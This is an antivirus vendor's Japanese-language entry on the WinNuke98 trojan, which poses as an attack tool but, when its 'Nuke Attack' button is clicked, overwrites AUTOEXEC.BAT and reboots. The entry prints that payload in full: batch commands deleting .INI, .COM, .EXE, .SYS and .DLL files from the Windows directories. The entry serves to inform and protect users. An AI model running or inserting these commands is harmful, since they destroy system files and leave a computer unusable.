ウイルス情報

ウイルス名

WinNuke98

種別 トロイの木馬
ファイルサイズ
最小定義ファイル
(最初に検出を確認したバージョン)
4100
対応定義ファイル
(現在必要とされるバージョン)
4320 (現在7661)
対応エンジン 4.0.70以降 (現在5600) 
エンジンバージョンの見分け方
情報掲載日 00/11/09
発見日(米国日付) 00/10/12
駆除補足 ウイルス駆除のヒント
概要 ウイルスの特徴 感染症状 感染方法 駆除方法


  • アタックツールと思われるWinNuke98は、攻撃の対象として認識されている人物ではなく、攻撃を開始する人物を攻撃します。

  • WinNuke98.exeが実行されると、ユーザは攻撃の対象となるIPアドレスとポートを入力するように要求されます。

  • Nuke Attackボタンをクリックすると、AUTOEXEC.BATファイルが次のコマンドで上書きされ、コンピュータがリブートされます。

    @ECHO OFF
    CD WINDOWS
    DEL *.INI
    DEL *.COM
    DEL *.EXE
    DEL *.SYS
    DEL *.DLL
    CD\
    CD WIN98
    DEL *.INI
    DEL *.COM
    DEL *.EXE
    DEL *.SYS
    DEL *.DLL
    CD\
    CD WIN95
    DEL *.INI
    DEL *.COM
    DEL *.EXE
    DEL *.SYS
    DEL *.DLL

  • WINDOWSディレクトリ内に.INI、.COM、.EXE、.SYS、.DLLファイルは存在しません。